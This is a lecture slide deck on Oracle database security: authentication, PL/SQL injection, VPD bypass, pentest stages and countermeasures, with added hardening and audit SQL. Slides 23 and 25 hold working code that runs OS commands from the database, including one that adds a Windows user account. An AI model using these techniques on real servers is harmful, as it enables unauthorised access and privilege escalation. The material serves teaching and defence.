
1 Information System Security

2 Outline
• Oracle Vulnerabilities
• Oracle Security Assessment
Information System Security - Week 10

3 Outline
• Oracle Vulnerabilities
• Oracle Security Assessment

4 Ways to attack

5 Outline
• Oracle Vulnerabilities
  - Users/Passwords
  - PL/SQL injection
  - Running System Commands
  - Other Vulnerabilities

6 Users/Passwords
• TNS protocol
• How does Oracle authenticate users?
• Vulnerabilities

7 TNS protocol

8 TNS protocol (cont)
• The TNS Listener is the hub of all communications in Oracle.
• Information gathering can be done through TNS.
Diagram: Client → Listener: Connect; Listener → Client: Accept or Redirect

9 TNS protocol (cont)

10 Authentication process
Diagram (Client/Server exchange):
1. Client: Send Username
2. Server: Generates Secret Number; Send AUTH_SESSKEY
3. Client: Decrypts AUTH_SESSKEY; Encrypts Password; Send AUTH_PASSWORD
4. Server: Compares with the password hash from database
5. Authenticated

11 How about Oracle 11g
Diagram (Client/Server exchange):
1. Client: Send Username
2. Server: Generates Secret Number; Send AUTH_SESSKEY and AUTH_VFR_DATA
3. Client: Decrypts AUTH_SESSKEY; Generates own AUTH_SESSKEY; Combines 2 AUTH_SESSKEY → Encrypt Password; Send AUTH_PASSWORD
4. Server: Compares with the password hash from database
5. Authenticated

12 Vulnerabilities
• Crypto aspect
  - If we have the password (hash) → get clear text password

13 Vulnerabilities (cont)
• Default usernames/passwords.
• Files for passwords.
• Brute-force.

14 PL/SQL Injection
• Introduction
• Procedures, functions
• Triggers
• VPD

15 Introduction
• PL/SQL is the programming language built into Oracle; it extends SQL.
• Can call external libraries (C or Java).
• Used to create procedures, functions, triggers…

16 Introduction (cont)
• Execution privileges.
  - Definer privileges: "owner" rights.
  - Invoker privileges: keyword AUTHID CURRENT_USER
• PL/SQL can be wrapped → working without source: DESCribe feature.

17 Procedures
• Similar to SQL injection.
• PL/SQL injection can occur with a statement like this:

    Select * from table_name where id='USER_INPUT'
    Select * from table_name where id='XXX' UNION SELECT ….

18 Procedures (cont)
• Inject a function into a PL/SQL statement. Keyword: AUTONOMOUS_TRANSACTION
• Take advantage of the rights (definer or invoker) that the functions/procedures run with.
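The definer/invoker distinction from slide 16 and the concatenation flaw from slide 17, shown as a vulnerable procedure beside hardened forms. This is an added example, not code from the presentation; the table demo_items and all procedure and function names are constructed for illustration.

```sql
-- Constructed sample table (not from the slides).
CREATE TABLE demo_items (id VARCHAR2(30), descr VARCHAR2(100));

-- "Before": definer rights (the default) and input concatenated into
-- dynamic SQL, so the caller's text becomes part of the statement and
-- runs with the owner's privileges.
CREATE OR REPLACE PROCEDURE get_item_unsafe (p_id IN VARCHAR2) IS
  v_descr demo_items.descr%TYPE;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT descr FROM demo_items WHERE id = ''' || p_id || ''''
    INTO v_descr;
  DBMS_OUTPUT.PUT_LINE(v_descr);
END;
/

-- "After": invoker rights plus a bind variable. The input is passed as
-- data only. Static SQL (SELECT ... INTO ... WHERE id = p_id) is
-- equally safe and simpler when the statement text is fixed.
CREATE OR REPLACE PROCEDURE get_item_safe (p_id IN VARCHAR2)
  AUTHID CURRENT_USER IS
  v_descr demo_items.descr%TYPE;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT descr FROM demo_items WHERE id = :id'
    INTO v_descr USING p_id;
  DBMS_OUTPUT.PUT_LINE(v_descr);
EXCEPTION
  WHEN NO_DATA_FOUND THEN
    DBMS_OUTPUT.PUT_LINE('no such item');
END;
/

-- Identifiers cannot be bound. When a table name must be dynamic,
-- validate it with DBMS_ASSERT before concatenating; an invalid
-- name raises ORA-44003 instead of reaching the SQL engine.
CREATE OR REPLACE FUNCTION count_rows_safe (p_table IN VARCHAR2)
  RETURN NUMBER AUTHID CURRENT_USER IS
  v_n NUMBER;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM ' || DBMS_ASSERT.SIMPLE_SQL_NAME(p_table)
    INTO v_n;
  RETURN v_n;
END;
/
```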

19 Triggers
• Similar to procedure/function injection.
• Note: triggers run with definer rights.
• Some real-world examples:
  - MDSYS.SDO_DROP_USER_BEFORE
  - MDSYS.SDO_GEOM_TRIG_INS1

20 VPD
• VPD is based on a policy function.
• Can be exploited through PL/SQL injection to drop the policy.
• Or exploited to grant the EXEMPT ACCESS POLICY privilege.
• Another way to defeat VPD is reading the raw file → HARD

21 Running System Commands
• Through PL/SQL
• Through Java
• Access File System
• Access Network

22 Through PL/SQL
• Uses the msvcrt.dll library to execute system commands.
• Must have the CREATE LIBRARY privilege to register a library in Oracle.
• Newer versions of Oracle only accept libraries in Oracle_home/bin.

23 Through PL/SQL (cont)

    CREATE OR REPLACE LIBRARY exec_shell AS 'C:\winnt\system32\msvcrt.dll';

    CREATE OR REPLACE PROCEDURE oraexec (cmdstring IN CHAR)
    IS EXTERNAL
      NAME "system"
      LIBRARY exec_shell
      LANGUAGE C;

    EXEC ORAEXEC('NET USER MYACCOUNT PASSWORD /ADD');

24 Through Java
• Does not need the CREATE LIBRARY privilege.
• Requires:
  - Execute on all files.
  - Write File Descriptor.
  - Read File Descriptor.

25 Through Java (cont)

    CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVACMD" AS
    import java.lang.*;
    import java.io.*;

    public class JAVACMD
    {
      public static void execCommand (String command) throws IOException
      {
        Runtime.getRuntime().exec(command);
      }
    };

26 Other ways
• Using DBMS Scheduler.
• Using Job Scheduler.
• Using Alter System statement.

27 Access File System
• Use the UTL_FILE library.
• Need the privilege to access a DIRECTORY object or to create a new one.
• Using Java: similar to running an OS command. Needs Read and Write permission.

28 Access Network
• Use UTL_TCP or UTL_HTTP.
• Create connection to a remote host → transfer data.

29 Other Vulnerabilities
• System configurations
  - O7_DICTIONARY_ACCESSIBILITY
  - remote_os_authent
  - dblink_encrypt_login
  - ..
• TNS protocol settings
• Application vulnerabilities

30 Other Vulnerabilities
• Session attack: http://www.youtube.com/watch?v=jjRrLJEbDQU
• Access Control bypass in Login: http://www.securityfocus.com/archive/1/422253

31 Outline
• Oracle Vulnerabilities
• Oracle Security Assessment

32 Oracle Assessment
• Vulnerability scanning
• Penetration testing

33 Vulnerability scanning
• Look for evidence of:
  - Vulnerable software versions
  - Presence or lack of patches
  - Misconfiguration

34 Vulnerability assessment tool
• Secure Oracle Auditor™ (SOA)

35 Penetration test
• A penetration test (pentest) is a method of evaluating the security of a computer system or network by simulating an attack from a malicious source.

36 Penetration test
• Stages:
  - Scope/Goal Definition
  - Information Gathering
  - Vulnerability Detection
  - Information Analysis and Planning
  - Attack & Penetration/Privilege Escalation
  - Result Analysis & Reporting
  - Cleanup

37 Information gathering
• Footprint
  - The first and most convenient way that hackers use to gather information.
  - Includes: internet, remote access, extranet…
  - Example: whois hvaonline.net

38 Example:

39 Attack
• SQL script

40 Vulnerability assessment tool
• AppDetectivePro for Oracle
• Metasploit

41 DATABASE SERVICES COUNTERMEASURES
• Remove default accounts, assign strong passwords to existing accounts, and enable auditing of failed logins.
• Keep the databases patched.
• Reduce privileges, such as those granted to PUBLIC, keep privileges to a minimum, and audit access to critical tables and views.

42 Summary
• Vulnerabilities usually occur because of inappropriate privilege grants:
  - CREATE ANY PROCEDURE
  - CREATE ANY TRIGGER
  - CREATE ANY VIEW
  - GRANT Something to PUBLIC
  - …
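The countermeasures and summary slides can be checked against the data dictionary. The script below is an added example, not part of the presentation; it assumes a DBA-privileged session, and the excluded grantees in the first query are an assumption to adjust per site.

```sql
-- Queries 1-7 are read-only; statement 8 turns on auditing.
-- 1. Holders of the broad privileges named in the summary slide.
SELECT grantee, privilege, admin_option
FROM   dba_sys_privs
WHERE  privilege IN ('CREATE ANY PROCEDURE', 'CREATE ANY TRIGGER',
                     'CREATE ANY VIEW', 'CREATE LIBRARY',
                     'CREATE ANY LIBRARY', 'EXEMPT ACCESS POLICY')
AND    grantee NOT IN ('SYS', 'SYSTEM')  -- assumption: extend per site
ORDER  BY privilege, grantee;

-- 2. System privileges and roles granted to PUBLIC.
SELECT privilege FROM dba_sys_privs WHERE grantee = 'PUBLIC';
SELECT granted_role FROM dba_role_privs WHERE grantee = 'PUBLIC';

-- 3. File and network packages executable by PUBLIC (slides 27-28).
SELECT owner, table_name, privilege
FROM   dba_tab_privs
WHERE  grantee = 'PUBLIC'
AND    privilege = 'EXECUTE'
AND    table_name IN ('UTL_FILE', 'UTL_TCP', 'UTL_HTTP');

-- 4. Registered external libraries and where they point (slide 22).
SELECT owner, library_name, file_spec
FROM   dba_libraries
WHERE  file_spec IS NOT NULL;

-- 5. Java permissions listed on slide 24.
SELECT grantee, type_name, name, action, enabled
FROM   dba_java_policy
WHERE  type_name = 'java.io.FilePermission'
OR     (type_name = 'java.lang.RuntimePermission'
        AND name IN ('readFileDescriptor', 'writeFileDescriptor'));

-- 6. Configuration parameters from slide 29 (a missing row means the
--    parameter does not exist in this release).
SELECT name, value
FROM   v$parameter
WHERE  name IN ('o7_dictionary_accessibility', 'remote_os_authent',
                'dblink_encrypt_login');

-- 7. Accounts still using a default password (view exists in 11g and later).
SELECT username FROM dba_users_with_defpwd;

-- 8. Record failed logins (effective when the audit_trail parameter is enabled).
AUDIT SESSION WHENEVER NOT SUCCESSFUL;
```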

